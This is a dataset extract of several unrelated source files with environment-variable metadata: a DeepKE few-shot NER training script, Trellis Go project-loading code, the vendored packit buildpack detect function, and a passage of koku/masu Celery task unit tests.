| [] | ["ZONE", "PROJECT", "API_URL", "INSTANCE_NAME"] | python | 4 | 0 | |
example/ner/few-shot/run.py | import os
import hydra
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]='1'
import logging
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "../")))
from hydra import utils
from torch.utils.data import DataLoader
from deepke.name_entity_re.few_shot.models.model import PromptBartModel, PromptGeneratorModel
from deepke.name_entity_re.few_shot.module.datasets import ConllNERProcessor, ConllNERDataset
from deepke.name_entity_re.few_shot.module.train import Trainer
from deepke.name_entity_re.few_shot.module.metrics import Seq2SeqSpanMetric
from deepke.name_entity_re.few_shot.utils.util import get_loss, set_seed
from deepke.name_entity_re.few_shot.module.mapping_type import mit_movie_mapping, mit_restaurant_mapping, atis_mapping
import warnings
warnings.filterwarnings("ignore", category=UserWarning)
from tensorboardX import SummaryWriter
writer = SummaryWriter(log_dir='logs')
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
DATASET_CLASS = {
'conll2003': ConllNERDataset,
'mit-movie': ConllNERDataset,
'mit-restaurant': ConllNERDataset,
'atis': ConllNERDataset
}
DATA_PROCESS = {
'conll2003': ConllNERProcessor,
'mit-movie': ConllNERProcessor,
'mit-restaurant': ConllNERProcessor,
'atis': ConllNERProcessor
}
DATA_PATH = {
'conll2003': {'train': 'data/conll2003/train.txt',
'dev': 'data/conll2003/dev.txt',
'test': 'data/conll2003/test.txt'},
'mit-movie': {'train': 'data/mit-movie/20-shot-train.txt',
'dev': 'data/mit-movie/test.txt'},
'mit-restaurant': {'train': 'data/mit-restaurant/10-shot-train.txt',
'dev': 'data/mit-restaurant/test.txt'},
'atis': {'train': 'data/atis/20-shot-train.txt',
'dev': 'data/atis/test.txt'}
}
MAPPING = {
'conll2003': {'loc': '<<location>>',
'per': '<<person>>',
'org': '<<organization>>',
'misc': '<<others>>'},
'mit-movie': mit_movie_mapping,
'mit-restaurant': mit_restaurant_mapping,
'atis': atis_mapping
}
@hydra.main(config_path="conf/config.yaml")
def main(cfg):
cwd = utils.get_original_cwd()
cfg.cwd = cwd
print(cfg)
data_path = DATA_PATH[cfg.dataset_name]
for mode, path in data_path.items():
data_path[mode] = os.path.join(cfg.cwd, path)
dataset_class, data_process = DATASET_CLASS[cfg.dataset_name], DATA_PROCESS[cfg.dataset_name]
mapping = MAPPING[cfg.dataset_name]
set_seed(cfg.seed) # set seed, default is 1
if cfg.save_path is not None: # make save_path dir
cfg.save_path = os.path.join(cfg.save_path, cfg.dataset_name+"_"+str(cfg.batch_size)+"_"+str(cfg.learning_rate)+cfg.notes)
if not os.path.exists(cfg.save_path):
os.makedirs(cfg.save_path, exist_ok=True)
process = data_process(data_path=data_path, mapping=mapping, bart_name=cfg.bart_name, learn_weights=cfg.learn_weights)
train_dataset = dataset_class(data_processor=process, mode='train')
train_dataloader = DataLoader(train_dataset, collate_fn=train_dataset.collate_fn, batch_size=cfg.batch_size, num_workers=4)
dev_dataset = dataset_class(data_processor=process, mode='dev')
dev_dataloader = DataLoader(dev_dataset, collate_fn=dev_dataset.collate_fn, batch_size=cfg.batch_size, num_workers=4)
label_ids = list(process.mapping2id.values())
prompt_model = PromptBartModel(tokenizer=process.tokenizer, label_ids=label_ids, args=cfg)
model = PromptGeneratorModel(prompt_model=prompt_model, bos_token_id=0,
eos_token_id=1,
max_length=cfg.tgt_max_len, max_len_a=cfg.src_seq_ratio,num_beams=cfg.num_beams, do_sample=False,
repetition_penalty=1, length_penalty=cfg.length_penalty, pad_token_id=1,
restricter=None)
metrics = Seq2SeqSpanMetric(eos_token_id=1, num_labels=len(label_ids), target_type='word')
loss = get_loss
trainer = Trainer(train_data=train_dataloader, dev_data=dev_dataloader, test_data=None, model=model, args=cfg, logger=logger, loss=loss,
metrics=metrics, writer=writer)
trainer.train()
writer.close()
if __name__ == "__main__":
main()
| []
| []
| [
"CUDA_DEVICE_ORDER",
"CUDA_VISIBLE_DEVICES"
]
| [] | ["CUDA_DEVICE_ORDER", "CUDA_VISIBLE_DEVICES"] | python | 2 | 0 | |
trellis/trellis.go | package trellis
import (
"errors"
"fmt"
"gopkg.in/ini.v1"
"gopkg.in/yaml.v2"
"io/ioutil"
"log"
"os"
"path/filepath"
"sort"
"strings"
)
const ConfigDir string = ".trellis"
type Trellis struct {
detector Detector
Environments map[string]*Config
ConfigPath string
Path string
Virtualenv *Virtualenv
}
func NewTrellis(d Detector) *Trellis {
return &Trellis{detector: d}
}
/*
Detect if a path is a Trellis project or not
This will traverse up the directory tree until it finds a valid project,
or stop at the root and give up.
*/
func (t *Trellis) Detect(path string) (projectPath string, ok bool) {
return t.detector.Detect(path)
}
func (t *Trellis) CreateConfigDir() error {
if err := os.Mkdir(t.ConfigPath, 0755); err != nil && !os.IsExist(err) {
return err
}
return nil
}
/*
Activates a Trellis project's virtualenv without loading the config files.
This is optimized to be a lighter weight version of LoadProject more suitable
for the shell hook.
*/
func (t *Trellis) ActivateProject() bool {
wd, err := os.Getwd()
if err != nil {
log.Fatal(err)
}
path, ok := t.Detect(wd)
if !ok {
return false
}
t.Path = path
t.ConfigPath = filepath.Join(path, ConfigDir)
t.Virtualenv = NewVirtualenv(t.ConfigPath)
if !t.Virtualenv.Initialized() {
return false
}
os.Chdir(t.Path)
return true
}
/*
Loads a Trellis project.
If a project is detected, the wordpress_sites config files are parsed and
the directory is changed to the project path.
*/
func (t *Trellis) LoadProject() error {
if t.Path != "" {
os.Chdir(t.Path)
return nil
}
wd, err := os.Getwd()
if err != nil {
log.Fatal(err)
}
path, ok := t.Detect(wd)
if !ok {
return errors.New("No Trellis project detected in the current directory or any of its parent directories.")
}
t.Path = path
t.ConfigPath = filepath.Join(path, ConfigDir)
t.Virtualenv = NewVirtualenv(t.ConfigPath)
os.Chdir(t.Path)
if os.Getenv("TRELLIS_VENV") != "false" {
if t.Virtualenv.Initialized() {
t.Virtualenv.Activate()
}
}
configPaths, _ := filepath.Glob("group_vars/*/wordpress_sites.yml")
envs := make([]string, len(configPaths))
t.Environments = make(map[string]*Config, len(configPaths)-1)
for i, p := range configPaths {
parts := strings.Split(p, string(os.PathSeparator))
envName := parts[1]
envs[i] = envName
t.Environments[envName] = t.ParseConfig(p)
}
return nil
}
func (t *Trellis) EnvironmentNames() []string {
var names []string
for key := range t.Environments {
names = append(names, key)
}
sort.Strings(names)
return names
}
func (t *Trellis) ValidateEnvironment(name string) (err error) {
_, ok := t.Environments[name]
if ok {
return nil
}
return fmt.Errorf("Error: %s is not a valid environment, valid options are %s", name, t.EnvironmentNames())
}
func (t *Trellis) SiteNamesFromEnvironment(environment string) []string {
var names []string
config := t.Environments[environment]
for name := range config.WordPressSites {
names = append(names, name)
}
sort.Strings(names)
return names
}
func (t *Trellis) FindSiteNameFromEnvironment(environment string, siteNameArg string) (string, error) {
if siteNameArg == "" {
return t.getDefaultSiteNameFromEnvironment(environment)
}
siteNames := t.SiteNamesFromEnvironment(environment)
for _, siteName := range siteNames {
if siteName == siteNameArg {
return siteName, nil
}
}
return "", fmt.Errorf("Error: %s is not a valid site. Valid options are %s", siteNameArg, siteNames)
}
func (t *Trellis) getDefaultSiteNameFromEnvironment(environment string) (siteName string, err error) {
sites := t.SiteNamesFromEnvironment(environment)
siteCount := len(sites)
switch {
case siteCount == 0:
return "", fmt.Errorf("Error: No sites found in %s", environment)
case siteCount > 1:
return "", fmt.Errorf("Error: Multiple sites found in %s. Please specific a site. Valid options are %s", environment, sites)
}
return sites[0], nil
}
func (t *Trellis) SiteFromEnvironmentAndName(environment string, name string) *Site {
return t.Environments[environment].WordPressSites[name]
}
func (t *Trellis) UpdateAnsibleConfig(section string, key string, value string) error {
ansibleCfg := filepath.Join(t.Path, "ansible.cfg")
cfg, err := ini.Load(ansibleCfg)
if err != nil {
return err
}
cfg.Section(section).Key(key).SetValue(value)
if err := cfg.SaveTo(ansibleCfg); err != nil {
return err
}
return nil
}
func (t *Trellis) WriteYamlFile(s interface{}, path string, header string) error {
data, err := yaml.Marshal(s)
if err != nil {
log.Fatal(err)
}
path = filepath.Join(t.Path, path)
data = append([]byte(header), data...)
if err := ioutil.WriteFile(path, data, 0666); err != nil {
log.Fatal(err)
}
return nil
}
| [
"\"TRELLIS_VENV\""
]
| []
| [
"TRELLIS_VENV"
]
| [] | ["TRELLIS_VENV"] | go | 1 | 0 | |
vendor/github.com/paketo-buildpacks/packit/detect.go | package packit
import (
"os"
"path/filepath"
"strings"
"github.com/BurntSushi/toml"
"github.com/paketo-buildpacks/packit/internal"
)
// DetectContext provides the contextual details that are made available by the
// buildpack lifecycle during the detect phase. This context is populated by
// the Detect function and passed to the DetectFunc during execution.
type DetectContext struct {
// WorkingDir is the location of the application source code as provided by
// the lifecycle.
WorkingDir string
// CNBPath is the absolute path location of the buildpack contents.
// This path is useful for finding the buildpack.toml or any other
// files included in the buildpack.
CNBPath string
// BuildpackInfo includes the details of the buildpack parsed from the
// buildpack.toml included in the buildpack contents.
BuildpackInfo BuildpackInfo
// Stack is the value of the chosen stack. This value is populated from the
// $CNB_STACK_ID environment variable.
Stack string
}
// DetectFunc is the definition of a callback that can be invoked when the
// Detect function is executed. Buildpack authors should implement a DetectFunc
// that performs the specific detect phase operations for a buildpack.
type DetectFunc func(DetectContext) (DetectResult, error)
// DetectResult allows buildpack authors to indicate the result of the detect
// phase for a given buildpack. This result, returned in a DetectFunc callback,
// will be parsed and persisted by the Detect function and returned to the
// lifecycle at the end of the detect phase execution.
type DetectResult struct {
// Plan is the set of Build Plan provisions and requirements that are
// detected during the detect phase of the lifecycle.
Plan BuildPlan
}
// BuildPlan is a representation of the Build Plan as specified in the
// specification:
// https://github.com/buildpacks/spec/blob/main/buildpack.md#build-plan-toml.
// The BuildPlan allows buildpacks to indicate what dependencies they provide
// or require.
type BuildPlan struct {
// Provides is a list of BuildPlanProvisions that are provided by this
// buildpack.
Provides []BuildPlanProvision `toml:"provides"`
// Requires is a list of BuildPlanRequirements that are required by this
// buildpack.
Requires []BuildPlanRequirement `toml:"requires"`
// Or is a list of additional BuildPlans that may be selected by the
// lifecycle
Or []BuildPlan `toml:"or,omitempty"`
}
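// An illustrative build plan (added for clarity; the values are hypothetical,
// while the field names follow the toml tags above and the linked specification):
//
//	[[provides]]
//	name = "node"
//
//	[[requires]]
//	name = "node"
//	[requires.metadata]
//	version-source = "package.json"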
// BuildPlanProvision is a representation of a dependency that can be provided
// by a buildpack.
type BuildPlanProvision struct {
// Name is the identifier whereby buildpacks can coordinate that a dependency
// is provided or required.
Name string `toml:"name"`
}
type BuildPlanRequirement struct {
// Name is the identifier whereby buildpacks can coordinate that a dependency
// is provided or required.
Name string `toml:"name"`
// Metadata is an unspecified field allowing buildpacks to communicate extra
// details about their requirement. Examples of this type of metadata might
// include details about what source was used to decide the version
// constraint for a requirement.
Metadata interface{} `toml:"metadata"`
}
// Detect is an implementation of the detect phase according to the Cloud
// Native Buildpacks specification. Calling this function with a DetectFunc
// will perform the detect phase process.
func Detect(f DetectFunc, options ...Option) {
config := OptionConfig{
exitHandler: internal.NewExitHandler(),
args: os.Args,
}
for _, option := range options {
config = option(config)
}
dir, err := os.Getwd()
if err != nil {
config.exitHandler.Error(err)
return
}
cnbPath, ok := os.LookupEnv("CNB_BUILDPACK_DIR")
if !ok {
cnbPath = filepath.Clean(strings.TrimSuffix(config.args[0], filepath.Join("bin", "detect")))
}
var buildpackInfo struct {
Buildpack BuildpackInfo `toml:"buildpack"`
}
_, err = toml.DecodeFile(filepath.Join(cnbPath, "buildpack.toml"), &buildpackInfo)
if err != nil {
config.exitHandler.Error(err)
return
}
result, err := f(DetectContext{
WorkingDir: dir,
CNBPath: cnbPath,
BuildpackInfo: buildpackInfo.Buildpack,
Stack: os.Getenv("CNB_STACK_ID"),
})
if err != nil {
config.exitHandler.Error(err)
return
}
file, err := os.OpenFile(config.args[2], os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0644)
if err != nil {
config.exitHandler.Error(err)
return
}
defer file.Close()
err = toml.NewEncoder(file).Encode(result.Plan)
if err != nil {
config.exitHandler.Error(err)
return
}
}
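// Illustrative usage (not part of the original file): a buildpack's detect
// binary would typically call Detect with its own DetectFunc, for example:
//
//	func main() {
//		packit.Detect(func(ctx packit.DetectContext) (packit.DetectResult, error) {
//			return packit.DetectResult{
//				Plan: packit.BuildPlan{
//					Provides: []packit.BuildPlanProvision{{Name: "node"}},
//					Requires: []packit.BuildPlanRequirement{{Name: "node"}},
//				},
//			}, nil
//		})
//	}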
| [
"\"CNB_STACK_ID\""
]
| []
| [
"CNB_STACK_ID"
]
| [] | ["CNB_STACK_ID"] | go | 1 | 0 | |
koku/masu/test/processor/test_tasks.py | #
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Test the download task."""
import json
import logging
import os
import shutil
import tempfile
import time
from datetime import date
from datetime import timedelta
from decimal import Decimal
from unittest import skip
from unittest.mock import ANY
from unittest.mock import Mock
from unittest.mock import patch
from uuid import uuid4
import faker
from dateutil import relativedelta
from django.core.cache import caches
from django.db.models import Max
from django.db.models import Min
from django.db.utils import IntegrityError
from tenant_schemas.utils import schema_context
from api.iam.models import Tenant
from api.models import Provider
from api.utils import DateHelper
from koku.middleware import KokuTenantMiddleware
from masu.config import Config
from masu.database import AWS_CUR_TABLE_MAP
from masu.database import OCP_REPORT_TABLE_MAP
from masu.database.aws_report_db_accessor import AWSReportDBAccessor
from masu.database.ocp_report_db_accessor import OCPReportDBAccessor
from masu.database.provider_db_accessor import ProviderDBAccessor
from masu.database.report_manifest_db_accessor import ReportManifestDBAccessor
from masu.database.report_stats_db_accessor import ReportStatsDBAccessor
from masu.exceptions import MasuProcessingError
from masu.exceptions import MasuProviderError
from masu.external.downloader.report_downloader_base import ReportDownloaderWarning
from masu.external.report_downloader import ReportDownloaderError
from masu.processor._tasks.download import _get_report_files
from masu.processor._tasks.process import _process_report_file
from masu.processor.expired_data_remover import ExpiredDataRemover
from masu.processor.report_processor import ReportProcessorError
from masu.processor.report_summary_updater import ReportSummaryUpdaterCloudError
from masu.processor.report_summary_updater import ReportSummaryUpdaterProviderNotFoundError
from masu.processor.tasks import autovacuum_tune_schema
from masu.processor.tasks import get_report_files
from masu.processor.tasks import normalize_table_options
from masu.processor.tasks import record_all_manifest_files
from masu.processor.tasks import record_report_status
from masu.processor.tasks import refresh_materialized_views
from masu.processor.tasks import REFRESH_MATERIALIZED_VIEWS_QUEUE
from masu.processor.tasks import remove_expired_data
from masu.processor.tasks import remove_stale_tenants
from masu.processor.tasks import summarize_reports
from masu.processor.tasks import update_all_summary_tables
from masu.processor.tasks import update_cost_model_costs
from masu.processor.tasks import UPDATE_COST_MODEL_COSTS_QUEUE
from masu.processor.tasks import update_summary_tables
from masu.processor.tasks import vacuum_schema
from masu.processor.worker_cache import create_single_task_cache_key
from masu.test import MasuTestCase
from masu.test.database.helpers import ReportObjectCreator
from masu.test.external.downloader.aws import fake_arn
from reporting_common.models import CostUsageReportStatus
LOG = logging.getLogger(__name__)
class FakeDownloader(Mock):
"""Fake Downloader."""
def download_report(self):
"""Get reports for fake downloader."""
fake_file_list = [
"/var/tmp/masu/my-report-name/aws/my-report-file.csv",
"/var/tmp/masu/other-report-name/aws/other-report-file.csv",
]
return fake_file_list
class GetReportFileTests(MasuTestCase):
"""Test Cases for the celery task."""
fake = faker.Faker()
@patch("masu.processor._tasks.download.ReportDownloader", return_value=FakeDownloader)
def test_get_report(self, fake_downloader):
"""Test task."""
account = fake_arn(service="iam", generate_account_id=True)
report = _get_report_files(
Mock(),
customer_name=self.fake.word(),
authentication=account,
provider_type=Provider.PROVIDER_AWS,
report_month=DateHelper().today,
provider_uuid=self.aws_provider_uuid,
billing_source=self.fake.word(),
report_context={},
)
self.assertIsInstance(report, list)
self.assertGreater(len(report), 0)
@patch("masu.processor._tasks.download.ReportDownloader", return_value=FakeDownloader)
def test_disk_status_logging(self, fake_downloader):
"""Test task for logging when temp directory exists."""
logging.disable(logging.NOTSET)
os.makedirs(Config.TMP_DIR, exist_ok=True)
account = fake_arn(service="iam", generate_account_id=True)
expected = "Available disk space"
with self.assertLogs("masu.processor._tasks.download", level="INFO") as logger:
_get_report_files(
Mock(),
customer_name=self.fake.word(),
authentication=account,
provider_type=Provider.PROVIDER_AWS,
report_month=DateHelper().today,
provider_uuid=self.aws_provider_uuid,
billing_source=self.fake.word(),
report_context={},
)
statement_found = any(expected in log for log in logger.output)
self.assertTrue(statement_found)
shutil.rmtree(Config.TMP_DIR, ignore_errors=True)
@patch("masu.processor._tasks.download.ReportDownloader", return_value=FakeDownloader)
def test_disk_status_logging_no_dir(self, fake_downloader):
"""Test task for logging when temp directory does not exist."""
logging.disable(logging.NOTSET)
Config.PVC_DIR = "/this/path/does/not/exist"
account = fake_arn(service="iam", generate_account_id=True)
expected = "Unable to find" + f" available disk space. {Config.PVC_DIR} does not exist"
with self.assertLogs("masu.processor._tasks.download", level="INFO") as logger:
_get_report_files(
Mock(),
customer_name=self.fake.word(),
authentication=account,
provider_type=Provider.PROVIDER_AWS,
report_month=DateHelper().today,
provider_uuid=self.aws_provider_uuid,
billing_source=self.fake.word(),
report_context={},
)
statement_found = any(expected in log for log in logger.output)
self.assertTrue(statement_found)
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor._tasks.download.ReportDownloader._set_downloader", side_effect=Exception("only a test"))
def test_get_report_task_exception(self, fake_downloader, mock_inspect):
"""Test task."""
account = fake_arn(service="iam", generate_account_id=True)
with self.assertRaises(Exception):
_get_report_files(
Mock(),
customer_name=self.fake.word(),
authentication=account,
provider_type=Provider.PROVIDER_AWS,
report_month=DateHelper().today,
provider_uuid=uuid4(),
billing_source=self.fake.word(),
report_context={},
)
class ProcessReportFileTests(MasuTestCase):
"""Test Cases for the Orchestrator object."""
@patch("masu.processor._tasks.process.ProviderDBAccessor")
@patch("masu.processor._tasks.process.ReportProcessor")
@patch("masu.processor._tasks.process.ReportStatsDBAccessor")
@patch("masu.processor._tasks.process.ReportManifestDBAccessor")
def test_process_file_initial_ingest(
self, mock_manifest_accessor, mock_stats_accessor, mock_processor, mock_provider_accessor
):
"""Test the process_report_file functionality on initial ingest."""
report_dir = tempfile.mkdtemp()
path = "{}/{}".format(report_dir, "file1.csv")
schema_name = self.schema
provider = Provider.PROVIDER_AWS
provider_uuid = self.aws_provider_uuid
report_dict = {
"file": path,
"compression": "gzip",
"start_date": str(DateHelper().today),
"provider_uuid": provider_uuid,
}
mock_proc = mock_processor()
mock_stats_acc = mock_stats_accessor().__enter__()
mock_manifest_acc = mock_manifest_accessor().__enter__()
mock_provider_acc = mock_provider_accessor().__enter__()
mock_provider_acc.get_setup_complete.return_value = False
_process_report_file(schema_name, provider, report_dict)
mock_proc.process.assert_called()
mock_proc.remove_processed_files.assert_not_called()
mock_stats_acc.log_last_started_datetime.assert_called()
mock_stats_acc.log_last_completed_datetime.assert_called()
mock_manifest_acc.mark_manifest_as_updated.assert_called()
mock_provider_acc.setup_complete.assert_called()
shutil.rmtree(report_dir)
@patch("masu.processor._tasks.process.ProviderDBAccessor")
@patch("masu.processor._tasks.process.ReportProcessor")
@patch("masu.processor._tasks.process.ReportStatsDBAccessor")
@patch("masu.processor._tasks.process.ReportManifestDBAccessor")
def test_process_file_non_initial_ingest(
self, mock_manifest_accessor, mock_stats_accessor, mock_processor, mock_provider_accessor
):
"""Test the process_report_file functionality on non-initial ingest."""
report_dir = tempfile.mkdtemp()
path = "{}/{}".format(report_dir, "file1.csv")
schema_name = self.schema
provider = Provider.PROVIDER_AWS
provider_uuid = self.aws_provider_uuid
report_dict = {
"file": path,
"compression": "gzip",
"start_date": str(DateHelper().today),
"provider_uuid": provider_uuid,
}
mock_proc = mock_processor()
mock_stats_acc = mock_stats_accessor().__enter__()
mock_manifest_acc = mock_manifest_accessor().__enter__()
mock_provider_acc = mock_provider_accessor().__enter__()
mock_provider_acc.get_setup_complete.return_value = True
_process_report_file(schema_name, provider, report_dict)
mock_proc.process.assert_called()
mock_proc.remove_processed_files.assert_called()
mock_stats_acc.log_last_started_datetime.assert_called()
mock_stats_acc.log_last_completed_datetime.assert_called()
mock_manifest_acc.mark_manifest_as_updated.assert_called()
mock_provider_acc.setup_complete.assert_called()
shutil.rmtree(report_dir)
@patch("masu.processor._tasks.process.ReportProcessor")
@patch("masu.processor._tasks.process.ReportStatsDBAccessor")
def test_process_file_exception(self, mock_stats_accessor, mock_processor):
"""Test the process_report_file functionality when exception is thrown."""
report_dir = tempfile.mkdtemp()
path = "{}/{}".format(report_dir, "file1.csv")
schema_name = self.schema
provider = Provider.PROVIDER_AWS
provider_uuid = self.aws_provider_uuid
report_dict = {
"file": path,
"compression": "gzip",
"start_date": str(DateHelper().today),
"provider_uuid": provider_uuid,
}
mock_processor.side_effect = ReportProcessorError("mock error")
mock_stats_acc = mock_stats_accessor().__enter__()
with self.assertRaises(ReportProcessorError):
_process_report_file(schema_name, provider, report_dict)
mock_stats_acc.log_last_started_datetime.assert_called()
mock_stats_acc.log_last_completed_datetime.assert_not_called()
shutil.rmtree(report_dir)
@patch("masu.processor._tasks.process.ReportProcessor")
@patch("masu.processor._tasks.process.ReportStatsDBAccessor")
def test_process_file_not_implemented_exception(self, mock_stats_accessor, mock_processor):
"""Test the process_report_file functionality when exception is thrown."""
report_dir = tempfile.mkdtemp()
path = "{}/{}".format(report_dir, "file1.csv")
schema_name = self.schema
provider = Provider.PROVIDER_AWS
provider_uuid = self.aws_provider_uuid
report_dict = {
"file": path,
"compression": "gzip",
"start_date": str(DateHelper().today),
"provider_uuid": provider_uuid,
}
mock_processor.side_effect = NotImplementedError("mock error")
mock_stats_acc = mock_stats_accessor().__enter__()
with self.assertRaises(NotImplementedError):
_process_report_file(schema_name, provider, report_dict)
mock_stats_acc.log_last_started_datetime.assert_called()
mock_stats_acc.log_last_completed_datetime.assert_called()
shutil.rmtree(report_dir)
@patch("masu.processor._tasks.process.ReportProcessor")
@patch("masu.processor._tasks.process.ReportStatsDBAccessor")
@patch("masu.database.report_manifest_db_accessor.ReportManifestDBAccessor")
def test_process_file_missing_manifest(self, mock_manifest_accessor, mock_stats_accessor, mock_processor):
"""Test the process_report_file functionality when manifest is missing."""
mock_manifest_accessor.get_manifest_by_id.return_value = None
report_dir = tempfile.mkdtemp()
path = "{}/{}".format(report_dir, "file1.csv")
schema_name = self.schema
provider = Provider.PROVIDER_AWS
provider_uuid = self.aws_provider_uuid
report_dict = {
"file": path,
"compression": "gzip",
"start_date": str(DateHelper().today),
"provider_uuid": provider_uuid,
}
mock_proc = mock_processor()
mock_stats_acc = mock_stats_accessor().__enter__()
mock_manifest_acc = mock_manifest_accessor().__enter__()
_process_report_file(schema_name, provider, report_dict)
mock_proc.process.assert_called()
mock_stats_acc.log_last_started_datetime.assert_called()
mock_stats_acc.log_last_completed_datetime.assert_called()
mock_manifest_acc.mark_manifest_as_updated.assert_not_called()
shutil.rmtree(report_dir)
@patch("masu.processor.tasks.update_summary_tables")
def test_summarize_reports_empty_list(self, mock_update_summary):
"""Test that the summarize_reports task is called when empty processing list is provided."""
mock_update_summary.delay = Mock()
summarize_reports([])
mock_update_summary.delay.assert_not_called()
@patch("masu.processor.tasks.update_summary_tables")
def test_summarize_reports_processing_list(self, mock_update_summary):
"""Test that the summarize_reports task is called when a processing list is provided."""
mock_update_summary.s = Mock()
report_meta = {}
report_meta["start_date"] = str(DateHelper().today)
report_meta["schema_name"] = self.schema
report_meta["provider_type"] = Provider.PROVIDER_OCP
report_meta["provider_uuid"] = self.ocp_test_provider_uuid
report_meta["manifest_id"] = 1
# add a report with start/end dates specified
report2_meta = {}
report2_meta["start_date"] = str(DateHelper().today)
report2_meta["schema_name"] = self.schema
report2_meta["provider_type"] = Provider.PROVIDER_OCP
report2_meta["provider_uuid"] = self.ocp_test_provider_uuid
report2_meta["manifest_id"] = 2
report2_meta["start"] = str(DateHelper().yesterday)
report2_meta["end"] = str(DateHelper().today)
reports_to_summarize = [report_meta, report2_meta]
summarize_reports(reports_to_summarize)
mock_update_summary.s.assert_called()
@patch("masu.processor.tasks.update_summary_tables")
def test_summarize_reports_processing_list_with_none(self, mock_update_summary):
"""Test that the summarize_reports task is called when a processing list when a None provided."""
mock_update_summary.s = Mock()
report_meta = {}
report_meta["start_date"] = str(DateHelper().today)
report_meta["schema_name"] = self.schema
report_meta["provider_type"] = Provider.PROVIDER_OCP
report_meta["provider_uuid"] = self.ocp_test_provider_uuid
report_meta["manifest_id"] = 1
reports_to_summarize = [report_meta, None]
summarize_reports(reports_to_summarize)
mock_update_summary.s.assert_called()
@patch("masu.processor.tasks.update_summary_tables")
def test_summarize_reports_processing_list_only_none(self, mock_update_summary):
"""Test that the summarize_reports task is called when a processing list with None provided."""
mock_update_summary.s = Mock()
reports_to_summarize = [None, None]
summarize_reports(reports_to_summarize)
mock_update_summary.s.assert_not_called()
class TestProcessorTasks(MasuTestCase):
"""Test cases for Processor Celery tasks."""
@classmethod
def setUpClass(cls):
"""Set up the class."""
super().setUpClass()
cls.fake = faker.Faker()
# cls.fake_reports = [
# {"file": cls.fake.word(), "compression": "GZIP"},
# {"file": cls.fake.word(), "compression": "PLAIN"},
# ]
# cls.fake_account = fake_arn(service="iam", generate_account_id=True)
cls.fake_uuid = "d4703b6e-cd1f-4253-bfd4-32bdeaf24f97"
cls.today = DateHelper().today
cls.yesterday = cls.today - timedelta(days=1)
def setUp(self):
"""Set up shared test variables."""
super().setUp()
self.test_assembly_id = "882083b7-ea62-4aab-aa6a-f0d08d65ee2b"
self.test_etag = "fake_etag"
self.get_report_args = {
"customer_name": self.schema,
"authentication": self.aws_provider.authentication.credentials,
"provider_type": Provider.PROVIDER_AWS_LOCAL,
"schema_name": self.schema,
"billing_source": self.aws_provider.billing_source.data_source,
"provider_uuid": self.aws_provider_uuid,
"report_month": DateHelper().today,
"report_context": {"current_file": f"/my/{self.test_assembly_id}/koku-1.csv.gz"},
}
@patch("masu.processor.tasks.WorkerCache.remove_task_from_cache")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor.tasks._process_report_file")
def test_get_report_files_exception(self, mock_process_files, mock_inspect, mock_cache_remove):
"""Test raising download exception is handled."""
exceptions = [MasuProcessingError, MasuProviderError, ReportDownloaderError]
for exception in exceptions:
with self.subTest(exception=exception):
with patch(
"masu.processor.tasks._get_report_files", side_effect=exception("Mocked exception!")
) as mock_get_files:
get_report_files(**self.get_report_args)
mock_get_files.assert_called()
mock_cache_remove.assert_called()
mock_process_files.assert_not_called()
@patch("masu.processor.tasks.WorkerCache.remove_task_from_cache")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor.tasks._get_report_files")
@patch("masu.processor.tasks._process_report_file", side_effect=ReportProcessorError("Mocked process error!"))
def test_get_report_process_exception(self, mock_process_files, mock_get_files, mock_inspect, mock_cache_remove):
"""Test raising processor exception is handled."""
mock_get_files.return_value = {"file": self.fake.word(), "compression": "GZIP"}
get_report_files(**self.get_report_args)
mock_cache_remove.assert_called()
@patch("masu.processor.tasks.WorkerCache.remove_task_from_cache")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor.tasks._get_report_files")
@patch("masu.processor.tasks._process_report_file", side_effect=NotImplementedError)
def test_get_report_process_not_implemented_error(
self, mock_process_files, mock_get_files, mock_inspect, mock_cache_remove
):
"""Test raising processor exception is handled."""
mock_get_files.return_value = {"file": self.fake.word(), "compression": "PLAIN"}
get_report_files(**self.get_report_args)
mock_cache_remove.assert_called()
@patch("masu.processor.tasks.WorkerCache.remove_task_from_cache")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor.tasks._get_report_files", side_effect=Exception("Mocked download error!"))
def test_get_report_broad_exception(self, mock_get_files, mock_inspect, mock_cache_remove):
"""Test raising download broad exception is handled."""
mock_get_files.return_value = {"file": self.fake.word(), "compression": "GZIP"}
get_report_files(**self.get_report_args)
mock_cache_remove.assert_called()
@patch("masu.processor.tasks.WorkerCache.remove_task_from_cache")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor.tasks._get_report_files", side_effect=ReportDownloaderWarning("Mocked download warning!"))
def test_get_report_download_warning(self, mock_get_files, mock_inspect, mock_cache_remove):
"""Test raising download warning is handled."""
mock_get_files.return_value = {"file": self.fake.word(), "compression": "GZIP"}
get_report_files(**self.get_report_args)
mock_cache_remove.assert_called()
class TestRemoveExpiredDataTasks(MasuTestCase):
"""Test cases for Processor Celery tasks."""
@patch.object(ExpiredDataRemover, "remove")
@patch("masu.processor.tasks.refresh_materialized_views.s")
def test_remove_expired_data(self, fake_view, fake_remover):
"""Test task."""
expected_results = [{"account_payer_id": "999999999", "billing_period_start": "2018-06-24 15:47:33.052509"}]
fake_remover.return_value = expected_results
expected = "INFO:masu.processor._tasks.remove_expired:Expired Data:\n {}"
# disable logging override set in masu/__init__.py
logging.disable(logging.NOTSET)
with self.assertLogs("masu.processor._tasks.remove_expired") as logger:
remove_expired_data(schema_name=self.schema, provider=Provider.PROVIDER_AWS, simulate=True)
self.assertIn(expected.format(str(expected_results)), logger.output)
class TestUpdateSummaryTablesTask(MasuTestCase):
"""Test cases for Processor summary table Celery tasks."""
@classmethod
def setUpClass(cls):
"""Set up for the class."""
super().setUpClass()
cls.aws_tables = list(AWS_CUR_TABLE_MAP.values())
cls.ocp_tables = list(OCP_REPORT_TABLE_MAP.values())
